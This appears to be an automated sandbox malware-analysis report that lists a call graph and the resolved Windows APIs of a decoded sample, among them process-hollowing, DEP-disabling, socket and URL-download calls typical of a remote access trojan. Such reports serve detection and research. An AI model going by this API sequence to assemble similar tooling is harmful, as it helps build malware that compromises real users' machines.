100093aa 70128->70130 70129 10008550 44 API calls 70131 100092e7 70129->70131 70132 100036c0 26 API calls 70130->70132 70133 10008550 44 API calls 70131->70133 70140 100092ef 70131->70140 70134 100093bf 70132->70134 70135 1000931a 70133->70135 70136 100093c4 70134->70136 70137 10009408 send 70134->70137 70138 10008550 44 API calls 70135->70138 70135->70140 70169 100084c0 70 API calls 70136->70169 70142 10009423 70137->70142 70138->70140 70140->70128 70141 100097c1 70143 1000948a send 70142->70143 70144 100094b4 70143->70144 70145 100094c7 send 70144->70145 70146 100094f0 70145->70146 70147 10009507 send 70146->70147 70148 10009520 70147->70148 70149 1000956e 70147->70149 70151 10009557 send 70148->70151 70150 1000959d send 70149->70150 70152 100095c2 70150->70152 70151->70149 70153 100095d7 send 70152->70153 70154 100095fc 70153->70154 70155 1000960f send 70154->70155 70156 10009620 70155->70156 70157 10009641 recv 70156->70157 70158 10009660 70156->70158 70157->70141 70157->70156 70159 10008550 44 API calls 70158->70159 70160 10009698 70159->70160 70160->70136 70162 100096ae 70160->70162 70161 100096d7 recv 70161->70141 70161->70162 70162->70161 70163 10009704 setsockopt ioctlsocket 70162->70163 70164 1000a5f3 new 22 API calls 70163->70164 70165 1000973a 70164->70165 70170 10008520 70166->70170 70169->70141 70171 10008534 ___scrt_initialize_default_local_stdio_options 70170->70171 70174 100147a1 70171->70174 70177 1000ff27 70174->70177 70178 1000ff44 70177->70178 70179 1000ff59 70177->70179 70197 100160ec 20 API calls __dosmaperr 70178->70197 70179->70178 70181 1000ff5f 70179->70181 70199 1000e3c5 38 API calls 2 library calls 70181->70199 70182 1000ff49 70198 1000da9b 26 API calls __cftof 70182->70198 70185 1000ff84 70200 10013d6a 44 API calls 2 library calls 70185->70200 70188 1000853e 70188->70129 70188->70140 70189 1000ff54 70190 1000b288 70189->70190 70191 1000b291 70190->70191 70192 1000b293 IsProcessorFeaturePresent 70190->70192 70191->70188 70194 1000b2d5 70192->70194 70201 1000b299 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 70194->70201 70196 1000b3b8 70196->70188 70197->70182 70198->70189 70199->70185 70200->70189 70201->70196 70202 416017 70203 416020 70202->70203 70219 416057 70202->70219 70204 401d64 28 API calls 70203->70204 70205 41602b 70204->70205 70206 401d64 28 API calls 70205->70206 70208 416038 70206->70208 70207 401f86 28 API calls 70211 416076 70207->70211 70209 4027ec 28 API calls 70208->70209 70210 416043 70209->70210 70213 4027cb 28 API calls 70210->70213 70212 401d64 28 API calls 70211->70212 70214 416087 70212->70214 70215 41604f 70213->70215 70216 401d64 28 API calls 70214->70216 70238 405d07 70215->70238 70218 416094 70216->70218 70220 4027ec 28 API calls 70218->70220 70219->70207 70221 41609f 70220->70221 70222 4027cb 28 API calls 70221->70222 70223 4160ab 70222->70223 70253 405d67 119 API calls 70223->70253 70225 4160b7 70226 401eea 11 API calls 70225->70226 70227 4160c0 70226->70227 70228 401eea 11 API calls 70227->70228 70229 4161e9 70228->70229 70230 4161f2 70229->70230 70231 401eea 11 API calls 70229->70231 70232 401d8c 11 API calls 70230->70232 70231->70230 70233 4161fb 70232->70233 70234 401eea 11 API calls 70233->70234 70235 416207 70234->70235 70236 401eea 11 API calls 70235->70236 70237 416213 70236->70237 70239 401ebd 28 API calls 70238->70239 70240 405d1e 70239->70240 70254 4040bb 70240->70254 70243 40428c 97 API calls 70244 405d31 70243->70244 70245 401fbd 28 API calls 70244->70245 70246 405d3c 70245->70246 70247 404468 61 API calls 70246->70247 70248 405d49 70247->70248 70249 4045d5 293 API calls 70248->70249 70250 405d5a 70249->70250 70258 4048a6 98 API calls 70250->70258 70253->70225 70255 4040cb 70254->70255 70256 4040fa 70255->70256 70257 4041f1 3 API calls 70255->70257 70256->70243 70257->70256 70259 446f53 GetLastError 70260 446f6c 70259->70260 70261 446f72 70259->70261 70285 447476 11 API calls 2 library calls 70260->70285 70265 446fc9 SetLastError 70261->70265 70278 448716 70261->70278 70267 446fd2 70265->70267 70266 446f8c 70286 446ad5 70266->70286 70270 446fa1 70270->70266 70272 446fa8 70270->70272 70271 446f92 70273 446fc0 SetLastError 70271->70273 70293 446d41 20 API calls _abort 70272->70293 70273->70267 70275 446fb3 70276 446ad5 _free 17 API calls 70275->70276 70277 446fb9 70276->70277 70277->70265 70277->70273 70283 448723 _strftime 70278->70283 70279 44874e RtlAllocateHeap 70281 446f84 70279->70281 70279->70283 70280 448763 70295 445364 20 API calls _abort 70280->70295 70281->70266 70292 4474cc 11 API calls 2 library calls 70281->70292 70283->70279 70283->70280 70294 442210 7 API calls 2 library calls 70283->70294 70285->70261 70287 446ae0 RtlFreeHeap 70286->70287 70291 446b09 __dosmaperr 70286->70291 70288 446af5 70287->70288 70287->70291 70296 445364 20 API calls _abort 70288->70296 70290 446afb GetLastError 70290->70291 70291->70271 70292->70270 70293->70275 70294->70283 70295->70281 70296->70290 70297 100085d8 70298 100085e1 70297->70298 70299 100085e3 getaddrinfo 70297->70299 70298->70299 70300 10008642 70299->70300 70301 100085fa FormatMessageA 70299->70301 70302 10008688 FreeAddrInfoW 70300->70302 70304 10008650 socket 70300->70304 70308 10008685 70300->70308 70303 1000862a 70301->70303 70310 100084c0 70 API calls 70303->70310 70304->70300 70305 10008666 connect 70304->70305 70305->70308 70309 10008678 closesocket 70305->70309 70307 10008633 70308->70302 70309->70300 70310->70307 70603 1000267b 70604 100034a0 28 API calls 70603->70604 70605 10002684 70604->70605 70642 100076d0 CreateToolhelp32Snapshot 70605->70642 70607 10002693 70652 10003330 70607->70652 70609 1000269c 70610 100026b7 70609->70610 70613 100026ed 70609->70613 70657 1000daab 26 API calls __cftof 70609->70657 70610->70613 70616 100026cb 70610->70616 70658 1000daab 26 API calls __cftof 70610->70658 70611 10002723 70615 10004ab0 28 API calls 70611->70615 70613->70611 70614 10004160 28 API calls 70613->70614 70614->70611 70617 10002734 70615->70617 70619 100026d7 70616->70619 70659 1000daab 26 API calls __cftof 70616->70659 70622 10004cc0 28 API calls 70617->70622 70621 100026e3 70619->70621 70660 1000daab 26 API calls __cftof 70619->70660 70621->70613 70661 1000daab 26 API calls __cftof 70621->70661 70624 1000274a 70622->70624 70626 10004e80 28 API calls 70624->70626 70627 10002762 70626->70627 70628 10004cc0 28 API calls 70627->70628 70629 10002778 CreateProcessW 70628->70629 70631 100027bc 70629->70631 70632 10002b20 38 API calls 70631->70632 70633 10002951 70632->70633 70634 10002a98 TerminateProcess WaitForSingleObject CloseHandle CloseHandle 70633->70634 70636 10003860 28 API calls 70633->70636 70635 10002acc 70634->70635 70638 100036c0 26 API calls 70635->70638 70637 1000296f 70636->70637 70639 10003860 28 API calls 70637->70639 70640 10002ad7 70638->70640 70641 10002983 70639->70641 70641->70634 70643 10007732 Process32FirstW 70642->70643 70644 10007755 70642->70644 70645 1000774e CloseHandle 70643->70645 70647 10007780 70643->70647 70644->70607 70645->70644 70646 10003970 28 API calls 70646->70647 70647->70646 70648 10004160 28 API calls 70647->70648 70649 10007844 Process32NextW 70647->70649 70662 100080a0 28 API calls std::_Xinvalid_argument 70647->70662 70648->70647 70649->70647 70651 10007860 CloseHandle 70649->70651 70651->70607 70653 1000333e 70652->70653 70656 10003353 70652->70656 70653->70656 70663 1000daab 26 API calls __cftof 70653->70663 70656->70609 70662->70649 70664 414dba 70679 41a52b 70664->70679 70666 414dc3 70667 401fbd 28 API calls 70666->70667 70668 414dd2 70667->70668 70669 404468 61 API calls 70668->70669 70670 414dde 70669->70670 70671 4161f2 70670->70671 70672 401eea 11 API calls 70670->70672 70673 401d8c 11 API calls 70671->70673 70672->70671 70674 4161fb 70673->70674 70675 401eea 11 API calls 70674->70675 70676 416207 70675->70676 70677 401eea 11 API calls 70676->70677 70678 416213 70677->70678 70680 41a539 70679->70680 70681 43a89c ___std_exception_copy 21 API calls 70680->70681 70682 41a543 InternetOpenW InternetOpenUrlW 70681->70682 70683 41a56c InternetReadFile 70682->70683 70687 41a58f 70683->70687 70684 41a5bc InternetCloseHandle InternetCloseHandle 70686 41a5ce 70684->70686 70685 401f86 28 API calls 70685->70687 70686->70666 70687->70683 70687->70684 70687->70685 70688 401eea 11 API calls 70687->70688 70688->70687 70311 1002175e 70312 10021775 70311->70312 70316 100217e3 70311->70316 70312->70316 70323 1002179d GetModuleHandleA 70312->70323 70313 10021829 70314 100217ec GetModuleHandleA 70317 100217f6 70314->70317 70316->70313 70316->70314 70316->70317 70317->70316 70318 10021816 GetProcAddress 70317->70318 70318->70316 70324 100217a6 70323->70324 70330 100217e3 70323->70330 70335 100217ba GetProcAddress 70324->70335 70326 10021829 70327 100217ec GetModuleHandleA 70332 100217f6 70327->70332 70330->70326 70330->70327 70330->70332 70332->70330 70334 10021816 GetProcAddress 70332->70334 70334->70330 70336 100217e3 70335->70336 70337 100217c4 VirtualProtect 70335->70337 70339 10021829 70336->70339 70340 100217ec GetModuleHandleA 70336->70340 70337->70336 70338 100217d3 VirtualProtect 70337->70338 70338->70336 70342 100217f6 70340->70342 70341 10021816 GetProcAddress 70341->70342 70342->70336 70342->70341 70343 41569e 70344 401d64 28 API calls 70343->70344 70345 4156b3 70344->70345 70346 401fbd 28 API calls 70345->70346 70347 4156bb 70346->70347 70348 401d64 28 API calls 70347->70348 70349 4156cb 70348->70349 70350 401fbd 28 API calls 70349->70350 70351 4156d3 70350->70351 70354 411aed 70351->70354 70355 4041f1 3 API calls 70354->70355 70356 411b01 70355->70356 70357 40428c 97 API calls 70356->70357 70358 411b09 70357->70358 70359 4027ec 28 API calls 70358->70359 70360 411b22 70359->70360 70361 4027cb 28 API calls 70360->70361 70362 411b2c 70361->70362 70363 404468 61 API calls 70362->70363 70364 411b36 70363->70364 70365 401eea 11 API calls 70364->70365 70366 411b3e 70365->70366 70367 4045d5 293 API calls 70366->70367 70368 411b4c 70367->70368 70369 401eea 11 API calls 70368->70369 70370 411b54 70369->70370 70371 401eea 11 API calls 70370->70371 70372 411b5c 70371->70372

                                                                                                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                                                                                                              Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                                                                                                                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                                                                                                                                                                                                                                              • API String ID: 384173800-625181639
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                                                                                                                                                                                                                                                                                                                              Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 101 40e134-40e154 call 401e8f call 412902 call 4112b5 70->101 89 40d9b5-40d9bc 79->89 90 40d9ae-40d9b0 79->90 80->79 99 40d98e-40d9a4 call 401e8f call 412902 80->99 94 40d9c0-40d9cc call 41a473 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 99->79 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->108 140 40da0b-40da11 138->140 140->108 141 40da13 call 4064d0 140->141 141->108 166 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 190 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->190 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 166->222 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 177 40dbc0-40dbe4 call 4022f8 call 4338d8 169->177 170->177 198 40dbf3 177->198 199 40dbe6-40dbf1 call 436060 177->199 190->163 204 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 259 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 204->259 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 259->222 272 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 259->272 272->222 292 40dc93 272->292 275 40dd81 273->275 276 40dd7d-40dd7f 273->276 278 40dd60-40dd77 call 41bec0 CreateThread 274->278 279 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->279 276->278 278->279 330 40dea1 279->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 332->344 353 40df6c-40df7f call 401d64 call 401e8f 343->353 354 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->354 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 353->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 353->366 354->353 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 392 40e004-40e00b 389->392 393 40dff8-40e002 CreateThread 389->393 394 40e019-40e020 392->394 395 40e00d-40e017 CreateThread 392->395 393->392 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a696 call 401eea 399->404 413 40e094-40e0d4 call 41ae18 call 401e07 call 412584 call 401e13 call 401e07 401->413 414 40e12a-40e12f call 40cbac call 413fd4 401->414 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 413->433 414->101 434 40e0f4-40e125 call 41ae18 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->414 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041BCF3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe,00000104), ref: 0040D790
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
